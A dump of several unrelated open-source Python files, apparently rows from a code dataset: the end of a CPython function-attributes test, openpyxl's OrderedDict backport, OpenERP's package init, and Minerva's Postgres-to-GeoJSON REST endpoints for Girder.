            except AttributeError: pass
            else: self.fail("setting attributes on methods should raise error")

    def test_delete_unknown_attr(self):
        try: del self.b.unknown_attr
        except AttributeError: pass
        # Bug fix: the original failure message claimed "TypeError", but the
        # except clause above (correctly) expects AttributeError.
        else: self.fail("deleting unknown attribute should raise AttributeError")

    def test_setting_attrs_duplicates(self):
        try: self.f.a.klass = self.f
        except AttributeError: pass
        else: self.fail("setting arbitrary attribute in unbound function "
                        " should raise AttributeError")
        # Attributes set on the underlying function show through both the
        # unbound and bound method wrappers.
        self.f.a.im_func.klass = self.f
        for method in [self.f.a, self.fi.a, self.fi.a.im_func]:
            self.assertEqual(method.klass, self.f)

    def test_unset_attr(self):
        for func in [self.b, self.f.a, self.fi.a]:
            try: func.non_existant_attr
            except AttributeError: pass
            else: self.fail("using unknown attributes should raise "
                            "AttributeError")
class FunctionDictsTest(FuncAttrsTest):
    """__dict__ / func_dict handling: assignment, deletion, hashability."""

    def test_setting_dict_to_invalid(self):
        # __dict__ must be a real dict: None and dict-like objects rejected.
        self.cannot_set_attr(self.b, '__dict__', None, TypeError)
        self.cannot_set_attr(self.b, 'func_dict', None, TypeError)
        from UserDict import UserDict
        d = UserDict({'known_attr': 7})
        self.cannot_set_attr(self.f.a.im_func, '__dict__', d, TypeError)
        self.cannot_set_attr(self.fi.a.im_func, '__dict__', d, TypeError)

    def test_setting_dict_to_valid(self):
        d = {'known_attr': 7}
        self.b.__dict__ = d
        # Setting dict is only possible on the underlying function objects
        self.f.a.im_func.__dict__ = d
        # Test assignment
        self.assertEqual(d, self.b.__dict__)
        self.assertEqual(d, self.b.func_dict)
        # ... and on all the different ways of referencing the method's func
        self.assertEqual(d, self.f.a.im_func.__dict__)
        self.assertEqual(d, self.f.a.__dict__)
        self.assertEqual(d, self.fi.a.im_func.__dict__)
        self.assertEqual(d, self.fi.a.__dict__)
        # Test value
        self.assertEqual(self.b.known_attr, 7)
        self.assertEqual(self.b.__dict__['known_attr'], 7)
        self.assertEqual(self.b.func_dict['known_attr'], 7)
        # ... and again, on all the different method's names
        self.assertEqual(self.f.a.im_func.known_attr, 7)
        self.assertEqual(self.f.a.known_attr, 7)
        self.assertEqual(self.fi.a.im_func.known_attr, 7)
        self.assertEqual(self.fi.a.known_attr, 7)

    def test_delete_func_dict(self):
        try: del self.b.__dict__
        except TypeError: pass
        else: self.fail("deleting function dictionary should raise TypeError")
        try: del self.b.func_dict
        except TypeError: pass
        else: self.fail("deleting function dictionary should raise TypeError")

    def test_unassigned_dict(self):
        self.assertEqual(self.b.__dict__, {})

    def test_func_as_dict_key(self):
        # Functions are hashable and usable as dict keys.
        value = "Some string"
        d = {}
        d[self.b] = value
        self.assertEqual(d[self.b], value)
class FunctionDocstringTest(FuncAttrsTest):
    """__doc__ / func_doc handling: assignment and deletion."""

    def test_set_docstring_attr(self):
        self.assertEqual(self.b.__doc__, None)
        self.assertEqual(self.b.func_doc, None)
        docstr = "A test method that does nothing"
        self.b.__doc__ = self.f.a.im_func.__doc__ = docstr
        self.assertEqual(self.b.__doc__, docstr)
        self.assertEqual(self.b.func_doc, docstr)
        self.assertEqual(self.f.a.__doc__, docstr)
        self.assertEqual(self.fi.a.__doc__, docstr)
        # Method wrappers expose but do not accept __doc__ assignment.
        self.cannot_set_attr(self.f.a, "__doc__", docstr, AttributeError)
        self.cannot_set_attr(self.fi.a, "__doc__", docstr, AttributeError)

    def test_delete_docstring(self):
        # Deleting either alias resets the docstring to None.
        self.b.__doc__ = "The docstring"
        del self.b.__doc__
        self.assertEqual(self.b.__doc__, None)
        self.assertEqual(self.b.func_doc, None)
        self.b.func_doc = "The docstring"
        del self.b.func_doc
        self.assertEqual(self.b.__doc__, None)
        self.assertEqual(self.b.func_doc, None)
def test_main():
    # Run all test cases; FuncAttrsTest itself is only a fixture base.
    test_support.run_unittest(FunctionPropertiesTest, ImplicitReferencesTest,
                              ArbitraryFunctionAttrTest, FunctionDictsTest,
                              FunctionDocstringTest)

if __name__ == "__main__":
    test_main()
| lgpl-2.1 |
htwenhe/DJOA | env/Lib/site-packages/openpyxl/compat/odict.py | 24 | 9421 | # Copyright (c) 2001-2011 Python Software Foundation
# 2011 Raymond Hettinger
# License: PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
# See http://www.opensource.org/licenses/Python-2.0 for full terms
# Note: backport changes by Raymond were originally distributed under MIT
# license, but since the original license for Python is more
# restrictive than MIT, code cannot be released under its terms and
# still adheres to the limitations of Python license.
# # {{{ http://code.activestate.com/recipes/576693/ (r9)
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
    'Dictionary that remembers insertion order'
    # An inherited dict maps keys to values.
    # The inherited dict provides __getitem__, __len__, __contains__, and get.
    # The remaining methods are order-aware.
    # Big-O running times for all methods are the same as for regular dictionaries.

    # The internal self.__map dictionary maps keys to links in a doubly linked list.
    # The circular doubly linked list starts and ends with a sentinel element.
    # The sentinel element never gets deleted (this simplifies the algorithm).
    # Each link is stored as a list of length three: [PREV, NEXT, KEY].

    def __init__(self, *args, **kwds):
        '''Initialize an ordered dictionary. Signature is the same as for
        regular dictionaries, but keyword arguments are not recommended
        because their insertion order is arbitrary.
        '''
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        try:
            self.__root
        except AttributeError:
            # First initialization only: build the sentinel and the
            # key -> link map (re-calling __init__ must not reset the order).
            self.__root = root = []  # sentinel node
            root[:] = [root, root, None]
            self.__map = {}
        self.__update(*args, **kwds)

    def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
        'od.__setitem__(i, y) <==> od[i]=y'
        # Setting a new item creates a new link which goes at the end of the linked
        # list, and the inherited dictionary is updated with the new key/value pair.
        if key not in self:
            root = self.__root
            last = root[0]
            last[1] = root[0] = self.__map[key] = [last, root, key]
        dict_setitem(self, key, value)

    def __delitem__(self, key, dict_delitem=dict.__delitem__):
        'od.__delitem__(y) <==> del od[y]'
        # Deleting an existing item uses self.__map to find the link which is
        # then removed by updating the links in the predecessor and successor nodes.
        dict_delitem(self, key)
        link_prev, link_next, key = self.__map.pop(key)
        link_prev[1] = link_next
        link_next[0] = link_prev

    def __iter__(self):
        'od.__iter__() <==> iter(od)'
        # Walk the linked list forward from the sentinel.
        root = self.__root
        curr = root[1]
        while curr is not root:
            yield curr[2]
            curr = curr[1]

    def __reversed__(self):
        'od.__reversed__() <==> reversed(od)'
        # Walk the linked list backward from the sentinel.
        root = self.__root
        curr = root[0]
        while curr is not root:
            yield curr[2]
            curr = curr[0]

    def clear(self):
        'od.clear() -> None. Remove all items from od.'
        try:
            # Break the link cycles so garbage collection is immediate.
            for node in self.__map.itervalues():
                del node[:]
            root = self.__root
            root[:] = [root, root, None]
            self.__map.clear()
        except AttributeError:
            pass
        dict.clear(self)

    def popitem(self, last=True):
        '''od.popitem() -> (k, v), return and remove a (key, value) pair.
        Pairs are returned in LIFO order if last is true or FIFO order if false.
        '''
        if not self:
            raise KeyError('dictionary is empty')
        root = self.__root
        if last:
            # Unlink the node just before the sentinel (newest).
            link = root[0]
            link_prev = link[0]
            link_prev[1] = root
            root[0] = link_prev
        else:
            # Unlink the node just after the sentinel (oldest).
            link = root[1]
            link_next = link[1]
            root[1] = link_next
            link_next[0] = root
        key = link[2]
        del self.__map[key]
        value = dict.pop(self, key)
        return key, value

    # -- the following methods do not depend on the internal structure --

    def keys(self):
        'od.keys() -> list of keys in od'
        return list(self)

    def values(self):
        'od.values() -> list of values in od'
        return [self[key] for key in self]

    def items(self):
        'od.items() -> list of (key, value) pairs in od'
        return [(key, self[key]) for key in self]

    def iterkeys(self):
        'od.iterkeys() -> an iterator over the keys in od'
        return iter(self)

    def itervalues(self):
        'od.itervalues -> an iterator over the values in od'
        for k in self:
            yield self[k]

    def iteritems(self):
        'od.iteritems -> an iterator over the (key, value) items in od'
        for k in self:
            yield (k, self[k])

    def update(*args, **kwds):
        '''od.update(E, **F) -> None. Update od from dict/iterable E and F.

        If E is a dict instance, does:           for k in E: od[k] = E[k]
        If E has a .keys() method, does:         for k in E.keys(): od[k] = E[k]
        Or if E is an iterable of items, does:   for k, v in E: od[k] = v
        In either case, this is followed by:     for k, v in F.items(): od[k] = v
        '''
        # Note: 'self' is extracted from *args so that a key named "self"
        # can still be passed as a keyword argument.
        if len(args) > 2:
            raise TypeError('update() takes at most 2 positional '
                            'arguments (%d given)' % (len(args),))
        elif not args:
            raise TypeError('update() takes at least 1 argument (0 given)')
        self = args[0]
        # Make progressively weaker assumptions about "other"
        other = ()
        if len(args) == 2:
            other = args[1]
        if isinstance(other, dict):
            for key in other:
                self[key] = other[key]
        elif hasattr(other, 'keys'):
            for key in other.keys():
                self[key] = other[key]
        else:
            for key, value in other:
                self[key] = value
        for key, value in kwds.items():
            self[key] = value

    __update = update  # let subclasses override update without breaking __init__

    __marker = object()

    def pop(self, key, default=__marker):
        '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
        If key is not found, d is returned if given, otherwise KeyError is raised.
        '''
        if key in self:
            result = self[key]
            del self[key]
            return result
        if default is self.__marker:
            raise KeyError(key)
        return default

    def setdefault(self, key, default=None):
        'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
        if key in self:
            return self[key]
        self[key] = default
        return default

    def __repr__(self, _repr_running={}):
        'od.__repr__() <==> repr(od)'
        # _repr_running guards against infinite recursion on self-referencing
        # dicts, keyed by (object id, thread id).
        call_key = id(self), _get_ident()
        if call_key in _repr_running:
            return '...'
        _repr_running[call_key] = 1
        try:
            if not self:
                return '%s()' % (self.__class__.__name__,)
            return '%s(%r)' % (self.__class__.__name__, self.items())
        finally:
            del _repr_running[call_key]

    def __reduce__(self):
        'Return state information for pickling'
        items = [[k, self[k]] for k in self]
        inst_dict = vars(self).copy()
        # Strip the implementation-internal attributes from the pickled state.
        for k in vars(OrderedDict()):
            inst_dict.pop(k, None)
        if inst_dict:
            return (self.__class__, (items,), inst_dict)
        return self.__class__, (items,)

    def copy(self):
        'od.copy() -> a shallow copy of od'
        return self.__class__(self)

    @classmethod
    def fromkeys(cls, iterable, value=None):
        '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
        and values equal to v (which defaults to None).
        '''
        d = cls()
        for key in iterable:
            d[key] = value
        return d

    def __eq__(self, other):
        '''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
        while comparison to a regular mapping is order-insensitive.
        '''
        if isinstance(other, OrderedDict):
            return len(self) == len(other) and self.items() == other.items()
        return dict.__eq__(self, other)

    def __ne__(self, other):
        return not self == other

    # -- the following methods are only used in Python 2.7 --

    def viewkeys(self):
        "od.viewkeys() -> a set-like object providing a view on od's keys"
        return KeysView(self)

    def viewvalues(self):
        "od.viewvalues() -> an object providing a view on od's values"
        return ValuesView(self)

    def viewitems(self):
        "od.viewitems() -> a set-like object providing a view on od's items"
        return ItemsView(self)
# # end of http://code.activestate.com/recipes/576693/ }}}
| mit |
rubencabrera/odoo | openerp/__init__.py | 235 | 3586 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core library."""
#----------------------------------------------------------
# Running mode flags (gevent, prefork)
#----------------------------------------------------------
# Is the server running with gevent.
import sys
evented = False
if sys.modules.get("gevent") is not None:
evented = True
# Is the server running in pefork mode (e.g. behind Gunicorn).
# If this is True, the processes have to communicate some events,
# e.g. database update or cache invalidation. Each process has also
# its own copy of the data structure and we don't need to care about
# locks between threads.
multi_process = False
#----------------------------------------------------------
# libc UTC hack
#----------------------------------------------------------
# Make sure the OpenERP server runs in UTC. This is especially necessary
# under Windows as under Linux it seems the real import of time is
# sufficiently deferred so that setting the TZ environment variable
# in openerp.cli.server was working.
import os
os.environ['TZ'] = 'UTC' # Set the timezone...
import time # ... *then* import time.
del os
del time
#----------------------------------------------------------
# Shortcuts
#----------------------------------------------------------
# The hard-coded super-user id (a.k.a. administrator, or root user).
SUPERUSER_ID = 1
def registry(database_name=None):
    """Return the model registry for *database_name*.

    When no name is given, the database bound to the current thread
    (``threading.currentThread().dbname``) is used instead.  If the
    registry does not exist yet, the RegistryManager creates it on
    the fly.
    """
    name = database_name
    if name is None:
        # Late import: threading is only needed on this fallback path.
        import threading
        name = threading.currentThread().dbname
    return modules.registry.RegistryManager.get(name)
#----------------------------------------------------------
# Imports
#----------------------------------------------------------
import addons
import conf
import loglevels
import modules
import netsvc
import osv
import pooler
import release
import report
import service
import sql_db
import tools
import workflow
#----------------------------------------------------------
# Model classes, fields, api decorators, and translations
#----------------------------------------------------------
from . import models
from . import fields
from . import api
from openerp.tools.translate import _
#----------------------------------------------------------
# Other imports, which may require stuff from above
#----------------------------------------------------------
import cli
import http
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Kitware/minerva | server/rest/postgres_geojson.py | 1 | 15834 | import hashlib
import json
from girder.api import access
from girder.api.describe import describeRoute, Description
from girder.api.rest import Resource, ValidationException, loadmodel
from girder.utility import assetstore_utilities, progress
from girder.plugins.minerva.rest.geojson_dataset import GeojsonDataset
from girder.plugins.minerva.utility.minerva_utility import findDatasetFolder
from .dataset import Dataset
class PostgresGeojson(Resource):
    """REST resource for building Minerva GeoJSON datasets from tables
    hosted in a Postgres ("database" type) Girder assetstore.

    Endpoints let a client discover eligible assetstores, browse their
    tables, columns and distinct values, preview record counts for a
    planned query, and finally create a GeoJSON dataset item from a
    filtered and aggregated query.
    """

    def __init__(self):
        super(PostgresGeojson, self).__init__()
        self.resourceName = 'minerva_postgres_geojson'
        self.route('GET', ('assetstores', ), self.getAssetstores)
        self.route('GET', ('tables', ), self.getTables)
        self.route('GET', ('columns', ), self.getColumns)
        self.route('GET', ('values', ), self.getValues)
        self.route('GET', ('all_values', ), self.getAllValues)
        self.route('POST', (), self.createPostgresGeojsonDataset)
        self.route('GET', ('result_metadata',), self.resultMetadata)
        self.route('GET', ('geometrylink', ), self.getGeometryLinkTarget)
        self.route('GET', ('geometrylinkfields', ), self.geometryLinkField)

    def _getQueryParams(self, schema, table, fields, group, filters,
                        output_format):
        """Build the query-description dict consumed by the database
        assetstore adapter (``queryDatabase`` / ``importData``).

        :param schema: database schema containing ``table``.
        :param table: table (or view) name to query.
        :param fields: list of output field/function descriptors.
        :param group: list of GROUP BY field names, or None.
        :param filters: filter condition object, or None.
        :param output_format: adapter output format, e.g. 'rawdict',
            'GeoJSON' or 'json'.
        """
        return {
            'tables': [{'name': '{}.{}'.format(schema, table),
                        'table': table,
                        'schema': schema}],
            'fields': fields,
            'group': group,
            'filters': filters,
            'limit': -1,  # no row limit: fetch the complete result set
            # This will potentially save database computing resource
            'clientid': str(self.getCurrentUser()['_id']),
            'format': output_format
        }

    @access.user
    @describeRoute(
        Description('Returns list of eligible assetstores')
    )
    def getAssetstores(self, params):
        """List the id and name of every Postgres database assetstore."""
        return list(self.model('assetstore').find(
            query={
                'type': 'database',
                'database.dbtype': 'sqlalchemy_postgres'
            },
            fields=['_id', 'name']))

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Returns list of tables from a database assetstore')
        .param('assetstoreId', 'assetstore ID of the target database')
    )
    def getTables(self, assetstore, params):
        """List table names in the assetstore's first database."""
        adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
        tables = adapter.getTableList()
        # tables is an array of databases, each of which has tables.  We
        # probably want to change this to not just use the first database.
        return [table['name'] for table in tables[0]['tables']]

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Returns list of columns for a given table')
        .param('assetstoreId', 'assetstore ID of the target database')
        .param('table', 'Table name from the database')
    )
    def getColumns(self, assetstore, params):
        return self._getColumns(assetstore, params)

    def _getColumns(self, assetstore, params):
        """Return the adapter's field metadata for ``params['table']``.

        Each entry is a dict with at least 'name' and 'datatype' keys
        (consumed by getAllValues / createPostgresGeojsonDataset).
        """
        adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
        conn = adapter.getDBConnectorForTable(params['table'])
        fields = conn.getFieldInfo()
        return fields

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Returns distinct values for a column')
        .param('assetstoreId', 'assetstore ID of the target database')
        .param('table', 'Table name from the database')
        .param('column', 'Column name from a table')
    )
    def getValues(self, assetstore, params):
        return self._getValues(assetstore, params)

    def _getValues(self, assetstore, params):
        """Return up to 200 distinct values of ``params['column']``,
        optionally restricted by an adapter filter object."""
        filter = params.get('filter')
        adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
        conn = adapter.getDBConnectorForTable(params['table'])
        queryParams = {
            'fields': [{
                'func': 'distinct',
                'param': [{'field': params['column']}],
                'reference': 'value',
            }],
            'filters': filter,
            'limit': 200,  # cap the list so very large columns stay cheap
            'format': 'rawdict'}
        result = list(adapter.queryDatabase(conn, queryParams)[0]())
        return [row['value'] for row in result]

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Returns all distinct values for all columns for a given table')
        .param('assetstoreId', 'assetstore ID of the target database')
        .param('table', 'Table name from the database')
    )
    def getAllValues(self, assetstore, params):
        """Map each categorical column name to its distinct values.

        Numeric columns and the 'geom' column are skipped: only
        non-number columns are useful as filter value choices.
        """
        resp = {}
        for i in self._getColumns(assetstore, params):
            if i['name'] != 'geom' and i['datatype'] != 'number':
                resp[i['name']] = self._getValues(assetstore, {
                    'column': i['name'],
                    'table': params['table']})
        return resp

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Create json dataset for the given view/table filtering values')
        .param('assetstoreId', 'assetstore ID of the target database')
        .param('table', 'Table name from the database')
        .param('field', 'Field to which the aggregate function will be applied')
        # Was documented as 'aggregationFunction', but the handler reads
        # params['aggregateFunction'] -- document the key actually used.
        .param('aggregateFunction', 'aggregate function used on the field')
        .param('filter', 'Filter condition object for filtering table data')
        .param('geometryField', 'Geometry data definition object')
        .param('datasetName', 'A custom name for the dataset', required=False)
    )
    def createPostgresGeojsonDataset(self, assetstore, params):
        """Create a GeoJSON dataset item from a filtered/aggregated query.

        Behavior depends on geometryField['type']:

        * 'built-in': the geometry is a PostGIS column of the table; the
          adapter emits GeoJSON Features directly, grouped by geometry.
        * 'link': rows are aggregated by the link columns and geometry is
          attached later from another dataset item.

        Returns the id of the newly imported item.
        """
        filter = params['filter']
        table = params['table']
        field = params['field']
        aggregateFunction = params['aggregateFunction']
        geometryField = json.loads(params['geometryField'])
        if geometryField['type'] == 'built-in':
            buildInGeomField = geometryField['field']
            properties = [field, {
                'func': aggregateFunction,
                'param': {'field': field}
            }]
            # add string fields with concat aggregate function and in the
            # format for json_build_object
            for i in self._getColumns(assetstore, {'table': params['table']}):
                if i['datatype'] == 'string' and i['name'] != field:
                    properties.extend((i['name'], {
                        'func': 'string_agg',
                        'param': [{
                            'func': 'distinct',
                            'param': {'field': i['name']}
                        }, '|'],
                        'reference': i['name']
                    }))
            # Emit one GeoJSON Feature per distinct geometry, reprojected
            # to EPSG:4326 as the GeoJSON spec expects.
            fields = [{
                'func': 'json_build_object', 'param': [
                    'type', 'Feature',
                    'geometry', {
                        'func': 'cast', 'param': [{
                            'func': 'st_asgeojson', 'param': [{
                                'func': 'st_transform', 'param': [{'field': buildInGeomField}, 4326]
                            }]}, 'JSON']
                    },
                    'properties', {
                        'func': 'json_build_object', 'param': properties
                    }
                ]
            }]
            group = [buildInGeomField]
        elif geometryField['type'] == 'link':
            fields = [{
                'func': aggregateFunction,
                'param': {'field': field},
                'reference': field
            }]
            group = [x['value'] for x in geometryField['links']]
            # add string fields with concat aggregate function
            for i in self._getColumns(assetstore, {'table': params['table']}):
                if i['datatype'] in ('string', 'number', 'date') and i['name'] != field:
                    if i['datatype'] == 'string':
                        fields.append({
                            'func': 'string_agg',
                            'param': [{
                                'func': 'distinct',
                                'param': {'field': i['name']}
                            }, '|'],
                            'reference': i['name']
                        })
        else:
            # Previously an unknown type fell through to a NameError on
            # 'fields'; reject it explicitly instead.
            raise ValidationException(
                'Unknown geometryField type: %s' % geometryField['type'])
        # datasetName is declared required=False, so use .get() rather
        # than indexing (indexing raised KeyError when it was omitted).
        datasetName = params.get('datasetName')
        # TODO: schema should be read from the listed table, not set explicitly
        schema = 'public'
        # Short digest of the filter keeps auto-generated names unique per
        # filter.  (Renamed from 'hash' to avoid shadowing the builtin.)
        filterHash = hashlib.md5(filter).hexdigest()
        if datasetName:
            output_name = datasetName
        else:
            output_name = '{0}.{1}.{2}.geojson'.format(
                table, field, filterHash[-6:])
        currentUser = self.getCurrentUser()
        datasetFolder = findDatasetFolder(currentUser, currentUser)
        adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
        # Create the item
        dbParams = self._getQueryParams(
            schema, table, fields, group, filter,
            'GeoJSON' if geometryField['type'] == 'built-in' else 'json')
        dbParams['tables'][0]['name'] = output_name
        result = adapter.importData(datasetFolder, 'folder', dbParams,
                                    progress.noProgress, currentUser)
        resItem = result[0]['item']
        # Record the creation parameters on the item as Minerva metadata.
        GeojsonDataset().createGeojsonDataset(
            itemId=resItem['_id'],
            postgresGeojson={
                'geometryField': geometryField,
                'field': field,
                'aggregateFunction': aggregateFunction
            }, params={})
        return resItem['_id']

    @access.user
    @loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
    @describeRoute(
        Description('Query metadata of result')
        .param('assetstoreId', 'assetstore ID of the target database')
        .param('table', 'Table name from the database')
        .param('field', 'Field to which the aggregate function will be applied')
        # Accepted for parity with the POST endpoint; not read here.
        .param('aggregateFunction', 'aggregate function used on the field')
        .param('filter', 'Filter condition object for filtering table data')
        .param('geometryField', 'Geometry data definition object')
    )
    def resultMetadata(self, assetstore, params):
        """Report record counts at each stage of dataset creation:
        total rows in the table, rows after filtering, rows after
        aggregation, and (for linked geometry only) rows after geometry
        linking plus the number of linking duplicates.
        """
        filter = params['filter']
        table = params['table']
        field = params['field']
        geometryField = json.loads(params['geometryField'])
        adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
        conn = adapter.getDBConnectorForTable(table)
        # Get total record count in table
        query = adapter.queryDatabase(conn, self._getQueryParams(
            'public', table, [{
                'func': 'count',
                'param': {'field': field},
                'reference': 'count'
            }], None, None, 'rawdict'))
        recordCountInTable = list(query[0]())[0]['count']
        # Get record count after filter
        if filter:
            query = adapter.queryDatabase(conn, self._getQueryParams(
                'public', table, [{
                    'func': 'count',
                    'param': {'field': field},
                    'reference': 'count'
                }], None, filter, 'rawdict'))
            recordCountAfterFilter = list(query[0]())[0]['count']
        else:
            recordCountAfterFilter = recordCountInTable
        # Get record count after aggregation: count of distinct grouping
        # keys -- the geometry column for 'built-in', the concatenated
        # link columns for 'link'.
        # NOTE(review): an unrecognized geometryField type would reuse the
        # previous query here; the UI appears to only send 'built-in' or
        # 'link' -- confirm before tightening.
        if geometryField['type'] == 'built-in':
            field = {'field': geometryField['field']}
            query = adapter.queryDatabase(conn, self._getQueryParams(
                'public', table, [{
                    'func': 'count',
                    'param': {
                        'func': 'distinct',
                        'param': field,
                    },
                    'reference': 'count'
                }], None, filter, 'rawdict'))
        elif geometryField['type'] == 'link':
            fields = [{'field': x['value']} for x in geometryField['links']]
            query = adapter.queryDatabase(conn, self._getQueryParams(
                'public', table, [{
                    'func': 'count',
                    'param': {
                        'func': 'distinct',
                        'param': {
                            'func': 'concat',
                            'param': fields,
                        },
                    },
                    'reference': 'count'
                }], None, filter, 'rawdict'))
        recordCountAfterAggregation = list(query[0]())[0]['count']
        # Get record count after geometry
        linkingDuplicateCount = None
        if geometryField['type'] == 'built-in':
            # Built-in geometry needs no linking step.
            recordCountAfterGeometryLinking = None
            recordCount = recordCountAfterAggregation
        elif geometryField['type'] == 'link':
            # Run the aggregation query and join it against the target
            # geometry dataset to count how many features actually link.
            fields = [x['value'] for x in geometryField['links']]
            group = [x['value'] for x in geometryField['links']]
            schema = 'public'
            dbParams = self._getQueryParams(
                schema, table, fields, group, filter, 'rawdict')
            query = adapter.queryDatabase(conn, dbParams)
            records = list(query[0]())
            dataset = Dataset()
            assembled, linkingDuplicateCount = dataset.linkAndAssembleGeometry(
                geometryField['links'], geometryField['itemId'], records)
            recordCountAfterGeometryLinking = len(assembled.features)
            recordCount = recordCountAfterGeometryLinking
        return {
            'recordCountInTable': recordCountInTable,
            'recordCountAfterFilter': recordCountAfterFilter,
            'recordCountAfterAggregation': recordCountAfterAggregation,
            'recordCountAfterGeometryLinking': recordCountAfterGeometryLinking,
            'linkingDuplicate': linkingDuplicateCount,
            'recordCount': recordCount
        }

    @access.user
    @describeRoute(
        Description("Get dataset of current user as geometry link targets")
    )
    def getGeometryLinkTarget(self, params):
        """List the current user's geojson dataset items (id and name)
        that can serve as geometry link targets."""
        currentUser = self.getCurrentUser()
        folder = findDatasetFolder(currentUser, currentUser)
        items = list(self.model('item').find(
            query={'folderId': folder['_id'],
                   'meta.minerva.dataset_type': 'geojson'},
            fields=['name']))
        return items

    @access.user
    @describeRoute(
        Description("Get keys of GeoJSON feature properties of a dataset")
        .param('itemId', 'Item id', required=True)
    )
    def geometryLinkField(self, params):
        """Return the property keys of the first feature of a geojson
        dataset item.

        Raises ValidationException when the item's content is not a
        GeoJSON FeatureCollection with at least one feature carrying a
        'properties' member.
        """
        currentUser = self.getCurrentUser()
        itemId = params['itemId']
        item = self.model('item').load(itemId, user=currentUser)
        featureCollections = Dataset().downloadDataset(item)
        if 'features' not in featureCollections or \
                len(featureCollections['features']) == 0 or \
                'properties' not in featureCollections['features'][0]:
            raise ValidationException('invalid geojson file')
        return featureCollections['features'][0]['properties'].keys()
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.